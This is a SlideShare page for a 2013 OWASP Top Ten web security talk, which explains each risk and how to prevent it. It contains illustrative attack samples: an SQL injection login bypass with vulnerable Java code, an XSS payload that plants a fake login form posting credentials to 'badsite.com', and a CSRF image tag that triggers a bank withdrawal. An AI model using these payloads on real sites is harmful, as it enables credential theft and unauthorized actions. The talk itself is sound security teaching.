SlideShare une entreprise Scribd logo

The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20

Télécharger en tant que ODP, PDF
Tabăra de Testare
Tabăra de Testare

Talk by Simon Bennetts Mozilla Security Team, OWASP ZAP Project Lead At Tabara de Testare Cluj Napoca, Romania

Technologie
1  sur  37
OWASP The OWASP Foundation http://www.owasp.org The OWASP Top Ten Most Critical Web Application Security Risks 2013/12/04 Simon Bennetts Mozilla Security Team, OWASP ZAP Project Lead psiinon@gmail.com Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Top Ten • Most Critical Web Application Security Risks Threat Agent Attack Vector Easy Weakness Prevalence Widespread Weakness Detectability Easy Technical Impact Severe Business Impact ? ? ? Average Common Average Moderate ? ? Difficult Uncommon Difficult Minor ? • A great place to start • Current list published in 2013 • Well known and well regarded • But … the vast majority of websites still have a high, critical or urgent issue 2
The OWASP Top Ten A1: Injection A2: Broken Authentication and Session Management A3: Cross-Site Scripting (XSS) A4: Insecure Direct Object References A5: Security Misconfiguration A6: Sensitive Data Exposure A7: Mission Function Level Access Control A8: Cross-Site Request Forgery (CSRF) A9: Using Components with Known Vulnerabilities A10: Unvalidated Redirects or Forwards 3
A1: Injection Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Average Severe • Tricking an application into including unintended commands in the data sent to an interpreter • SQL, OS Shell, LDAP, Xpath, Hibernate… • Impact: SEVERE! • Unauthorized application access • Unauthorized data access • OS access… 4
A1: Injection User Server Db 5
A1: Injection (SQL) • Example UI: Name: admin ʹ-- Password: ******* Login • Example code: String sql = “SELECT * FROM users where username = ʹ” + username + “ʹ and password = ʹ” + password + “ʹ”; • Expected SQL: SELECT * FROM users where username = ʹadminʹ and password = ʹc0rr3ctʹ 6
A1: Injection (SQL) • Example UI: Name: admin ʹ-- Password: ******* Login • Example code: String sql = “SELECT * FROM users where username = ʹ” + username + “ʹ and password = ʹ” + password + “ʹ”; • Expected SQL: SELECT * FROM users where username = ʹadminʹ and password = ʹc0rr3ctʹ • Resulting SQL query: SELECT * FROM users where username = ʹadminʹ--ʹ and password = ʹanythingʹ 7
A1: Injection • Prevention: • Use interfaces that provide a parameterized interface: • Prepared Statements • Stored Procedures • • Encode all user input • • Whitelist input Minimize database privileges OWASP SQL Injection Prevention Cheat sheet 8
A2: Broken Authentication and Session Management Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Widespread Average Severe • HTTP is stateless • Session IDs used to track state, good as credentials to an attacker • Can be accessed via sniffer, logs, XSS… • Change my password, forgotten my password, secret questions … • Impact: sessions hijacked / accounts compromised 9
A2: Broken Authentication and Session Management • Prevention: • Use standard implementations • Use SSL for ALL requests • Thoroughly test all authentication related functionality • Use SECURE & HTTPOnly cookies flags • Avoid XSS flaws 10
A3: Cross Site Scripting (XSS) Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average VERY Widespread Easy Moderate • Injecting malicious content/code into web pages • HTML / javascript most common, but many other technologies also vulnerable: • Java, Active X, Flash, RSS, Atom, … • Present in 68% of all web applications in 2011 • Can be present in form and URL parameters AND cookies 11
A3: Cross Site Scripting • Impact: (XSS) • Session hijacking • Unauthorized data access • Web page rewriting • Redirect users (eg to phishing or malware sites) • Anything the web application can do… 12
A2: Cross Site Scripting (XSS) Reflected Persistent 13
A2: Cross Site Scripting (XSS) DOM 14
A3: Cross Site Scripting • Forum: “Have you seen XYZ are being taken over?? (XSS) http://tinyurl/jdfgshr” XYZ – We’re being taken over! https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%20 Search this site: Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! Username: Password: Login 15
A3: Cross Site Scripting (XSS) found! XYZ – No Search Result https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%2 Search this site: No search result found for: “</div><script>document.title=‘XYZ – We’re being taken over!’; Document.getElementById(‘results’).style.display=‘none’; </script> Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! <table><form action=‘http://badsite.com/gotcha’> <tr><td>Username:</td><td><input id=‘user’></td></tr> <tr><td>Password:</td><td><input id=‘password’ type=…” 16
A3: Cross Site Scripting • View Source: (XSS) : <div id = “results”> <p>No search result found for: </p> <!-- start of users search term --> “ </div><script>document.title=‘XYZ – We’re being taken over!’; Document.getElementById(‘results’).style.display=‘none’; </script> Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing! <table><form action=‘http://badsite.com/gotcha’> <tr><td>Username:</td><td><input id=‘user’></td></tr> <tr><td>Password:</td><td><input id=‘password’ type=… ” <!-- end of users search term --> : 17
• A3: Cross Site Scripting Prevention: (XSS) • • Whitelist input • Encode output (e.g. using OWASP ESAPI) • • Don’t output user supplied input  If you must support user supplied HTML, use libraries like OWASP’s AntiSamy OWASP XSS Prevention Cheat sheet 18
A4: Insecure Direct Object Reference Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Easy Moderate • A direct reference to an object that is not validated on each request • user=psiinon@gmail.com • company=Mega%20Corp • account=7352820 • Typically in FORM and URL parameters (cookies less likely) • Impact: accounts and data compromised 19
A4: Insecure Direct Object Reference • Attacker notices URL: acct=6065 • Modifies it to acct=6066 • Attacker can view (and maybe change?) the victims account 20
A4: Insecure Direct Object Reference • Prevention: • Use per user or per session indirect object references (ESAPI supports integer and random mapping) • Validate Direct Object References on each request 21
A5: Security Misconfiguration Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Easy Moderate • Another multitude of sins  • Server / Application configuration • Lack of server and application hardening • Unpatched OS, services, libraries • Default accounts • Detailed error messages (e.g. stack traces) • Unprotected files and directories 22
A5: Security Misconfiguration • Impact: • Server compromise • Exploitation of known vulnerabilities • Prevention: • Repeatable server and application hardening process • Patch OS, services, libraries • Strong architecture that ensures secure separation between components 23
A6: Sensitive Data Exposure Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Difficult Uncommon Average Severe • Exposure of: • Credentials • Credit card numbers • Bank account details • Any sensitive data… • In: Databases, Files, Logs, Backups … 24
A6: Sensitive Data Exposure • Impact: • Attackers access or modify sensitive data • Attackers use sensitive data in further attacks • Company embarrassment, loss of trust • Company sued or fined 25
A6: Sensitive Data Exposure • Prevention: • Identify sensitive data • Store as little sensitive data as possible  • Protect with suitable mechanisms (file, db, element encryption, SSL) • Only use standard, well recognised algorithms • Check your implementation! 26
A7: Missing Function Level Access Control Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Common Average Moderate • UI showing navigation to unauthorized functions • Server side authentication or authorization checks missing • Server side checks relying solely on attacker provided information • Impact: • Unauthorized account and data access • Access to administrative functionality 27
A7: Missing Function Level Access Control • Prevention: • Process for managing entitlements thats easy to update and audit • Deny access by default, require specific grants to specific roles for access to every function • Check workflow for correct state 28
A8: Cross site request forgery Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Common Easy Moderate • Exploits sessions established in other browser windows or tabs • Impact: Attacker can perform any action on behalf of the victim 29
A8: Cross site request forgery Browser 1 4 example.bank.com $$$ 5 2 3 bad.site.com <img src=“…”> <img src= "https://example.bank.com/withdraw? account=bob&amount=1000000&for=mallory" > 30
A8: Cross site request forgery • Prevention: • Never allow GETs to change things • Anti CSRF tokens • Viewstate (ASP.NET) • OWASP CSRF Guard • Challenge-Response • Re-Authentication • CAPTCHA 31
A9: Using Components with Known Vulnerabilities Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Widespread Difficult Moderate • As per the title! • Impact: • Full range of weaknesses, including injection, broken access control, XSS … • Minimal → complete host takeover and data compromise 32
A9: Using Components with Known Vulnerabilities • Prevention: • Identify all components and versions in use • Monitor security of these components • Keep components up to date • Establish security policies governing use • If necessary add wrappers to disable unused or vulnerable aspects of components 33
A10: Unvalidated Redirects and Forwards Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Average Uncommon Easy Moderate • Redirects are common and send the user to a new site .. which could be malicious if not validated! http://fail.com/redir.php?url=badsite.com • Forwards (Transfers) send the request to a new page in the same application .. which could bypass authentication or authorization http://fail.com/redir.php?url=admin.php 34
A10: Unvalidated Redirects and Forwards • Impact: • Redirect victim to phishing or malware site • Attacker’s request is forwarded past security checks, allowing unauthorized function or data access • Prevention: • Avoid using them • Dont use user supplied data for destination • Validate any user data that must be used 35
Where Next? • Read and understand the full document! • Read the OWASP Developers Guide • Watch the OWASP AppSec Tutorial videos on youtube • Re-examine your code! • Introduce a Secure Development Lifecycle • Use tools like the OWASP Zed Attack Proxy  36
Any Questions? https://www.owasp.org/index.php/Top_10_2013

Recommandé

Evaluating Web App, Mobile App, and API Security - Matt Cohen
Evaluating Web App, Mobile App, and API Security - Matt CohenEvaluating Web App, Mobile App, and API Security - Matt Cohen
Evaluating Web App, Mobile App, and API Security - Matt CohenInman News
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014ColdFusionConference
 
Cyber ppt
Cyber pptCyber ppt
Cyber pptkarthik menon
 
Anatomy Web Attack
Anatomy Web AttackAnatomy Web Attack
Anatomy Web AttackKelly Speiser
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Web attacks
Web attacksWeb attacks
Web attackshusnara mohammad
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishMarkus Eisele
 

Recommandé

Evaluating Web App, Mobile App, and API Security - Matt Cohen
Evaluating Web App, Mobile App, and API Security - Matt CohenEvaluating Web App, Mobile App, and API Security - Matt Cohen
Evaluating Web App, Mobile App, and API Security - Matt CohenInman News
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014ColdFusionConference
 
Cyber ppt
Cyber pptCyber ppt
Cyber pptkarthik menon
 
Anatomy Web Attack
Anatomy Web AttackAnatomy Web Attack
Anatomy Web AttackKelly Speiser
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Web attacks
Web attacksWeb attacks
Web attackshusnara mohammad
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishMarkus Eisele
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themMasoud Kalali
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentationAshwini Paranjpe
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Owasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentationOwasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentationIslam Azeddine Mennouchi
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017Michael Furman
 
Owasp & Asp.Net
Owasp & Asp.NetOwasp & Asp.Net
Owasp & Asp.NetÖnsel Akın
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASPIsuru Samaraweera
 
Attques web
Attques webAttques web
Attques webTarek MOHAMED
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
Unit tests benefits
Unit tests benefitsUnit tests benefits
Unit tests benefitsKate Semizhon
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 

Contenu connexe

Tendances

How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themMasoud Kalali
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 

Tendances (20)

How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Owasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentationOwasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentation
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
 
Owasp & Asp.Net
Owasp & Asp.NetOwasp & Asp.Net
Owasp & Asp.Net
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Attques web
Attques webAttques web
Attques web
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
 

En vedette

Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Robotium framework & Jenkins CI tools - TdT@Cluj #19
Robotium framework & Jenkins CI tools - TdT@Cluj #19Robotium framework & Jenkins CI tools - TdT@Cluj #19
Robotium framework & Jenkins CI tools - TdT@Cluj #19Tabăra de Testare
 
Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20
Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20
Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20Tabăra de Testare
 
A5-Security misconfiguration-OWASP 2013
A5-Security misconfiguration-OWASP 2013 A5-Security misconfiguration-OWASP 2013
A5-Security misconfiguration-OWASP 2013 Sorina Chirilă
 
Code Review
Code ReviewCode Review
Code Reviewrantav
 
Code Review Tool Evaluation
Code Review Tool EvaluationCode Review Tool Evaluation
Code Review Tool EvaluationKate Semizhon
 
Code review guidelines
Code review guidelinesCode review guidelines
Code review guidelinesLalit Kale
 

En vedette (10)

Unit tests benefits
Unit tests benefitsUnit tests benefits
Unit tests benefits
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP Applications
 
Robotium framework & Jenkins CI tools - TdT@Cluj #19
Robotium framework & Jenkins CI tools - TdT@Cluj #19Robotium framework & Jenkins CI tools - TdT@Cluj #19
Robotium framework & Jenkins CI tools - TdT@Cluj #19
 
Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20
Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20
Zed Attack Proxy (ZAP) Quick Intro - TdT@Cluj #20
 
A5-Security misconfiguration-OWASP 2013
A5-Security misconfiguration-OWASP 2013 A5-Security misconfiguration-OWASP 2013
A5-Security misconfiguration-OWASP 2013
 
Code Review
Code ReviewCode Review
Code Review
 
Code Review
Code ReviewCode Review
Code Review
 
Effective code reviews
Effective code reviewsEffective code reviews
Effective code reviews
 
Code Review Tool Evaluation
Code Review Tool EvaluationCode Review Tool Evaluation
Code Review Tool Evaluation
 
Code review guidelines
Code review guidelinesCode review guidelines
Code review guidelines
 

Similaire à The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20

2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentationowasp-pune
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015devObjective
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-mspMike Saunders
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFBrian Huff
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteDNN
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security NinjaPaul Gilzow
 
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - Trivadis
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - TrivadisTechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - Trivadis
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - TrivadisTrivadis
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEArun Voleti
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecLalit Kale
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a DatabaseJohn Ashmead
 

Similaire à The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20 (20)

2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security Ninja
 
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - Trivadis
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - TrivadisTechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - Trivadis
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - Trivadis
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomation
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 

Plus de Tabăra de Testare

Tap into mobile app testing@TDT Iasi Sept2013
Tap into mobile app testing@TDT Iasi Sept2013Tap into mobile app testing@TDT Iasi Sept2013
Tap into mobile app testing@TDT Iasi Sept2013Tabăra de Testare
 
Test analysis & design good practices@TDT Iasi 17Oct2013
Test analysis & design good practices@TDT Iasi 17Oct2013Test analysis & design good practices@TDT Iasi 17Oct2013
Test analysis & design good practices@TDT Iasi 17Oct2013Tabăra de Testare
 
Webdriver with Thucydides - TdT@Cluj #18
Webdriver with Thucydides - TdT@Cluj #18Webdriver with Thucydides - TdT@Cluj #18
Webdriver with Thucydides - TdT@Cluj #18Tabăra de Testare
 
Behavior Driven Development - TdT@Cluj #15
Behavior Driven Development - TdT@Cluj #15Behavior Driven Development - TdT@Cluj #15
Behavior Driven Development - TdT@Cluj #15Tabăra de Testare
 
TdT@Cluj #14 - Mobile Testing Workshop
TdT@Cluj #14 - Mobile Testing WorkshopTdT@Cluj #14 - Mobile Testing Workshop
TdT@Cluj #14 - Mobile Testing WorkshopTabăra de Testare
 
Test Automation Techniques for Windows Applications
Test Automation Techniques for Windows ApplicationsTest Automation Techniques for Windows Applications
Test Automation Techniques for Windows ApplicationsTabăra de Testare
 
How to bring creativity in testing
How to bring creativity in testingHow to bring creativity in testing
How to bring creativity in testingTabăra de Testare
 
Testarea: Prieten sau dusman? Adrian speteanu
Testarea: Prieten sau dusman? Adrian speteanuTestarea: Prieten sau dusman? Adrian speteanu
Testarea: Prieten sau dusman? Adrian speteanuTabăra de Testare
 

Plus de Tabăra de Testare (20)

Tap into mobile app testing@TDT Iasi Sept2013
Tap into mobile app testing@TDT Iasi Sept2013Tap into mobile app testing@TDT Iasi Sept2013
Tap into mobile app testing@TDT Iasi Sept2013
 
Test analysis & design good practices@TDT Iasi 17Oct2013
Test analysis & design good practices@TDT Iasi 17Oct2013Test analysis & design good practices@TDT Iasi 17Oct2013
Test analysis & design good practices@TDT Iasi 17Oct2013
 
Webdriver with Thucydides - TdT@Cluj #18
Webdriver with Thucydides - TdT@Cluj #18Webdriver with Thucydides - TdT@Cluj #18
Webdriver with Thucydides - TdT@Cluj #18
 
Mobile Web UX - TdT@Cluj #17
Mobile Web UX - TdT@Cluj #17Mobile Web UX - TdT@Cluj #17
Mobile Web UX - TdT@Cluj #17
 
Behavior Driven Development - TdT@Cluj #15
Behavior Driven Development - TdT@Cluj #15Behavior Driven Development - TdT@Cluj #15
Behavior Driven Development - TdT@Cluj #15
 
TdT@Cluj #14 - Mobile Testing Workshop
TdT@Cluj #14 - Mobile Testing WorkshopTdT@Cluj #14 - Mobile Testing Workshop
TdT@Cluj #14 - Mobile Testing Workshop
 
Security testing
Security testingSecurity testing
Security testing
 
Mobile Testing - TdT Cluj #13
Mobile Testing - TdT Cluj #13Mobile Testing - TdT Cluj #13
Mobile Testing - TdT Cluj #13
 
Td t summary
Td t summaryTd t summary
Td t summary
 
How to evaluate a tester
How to evaluate a testerHow to evaluate a tester
How to evaluate a tester
 
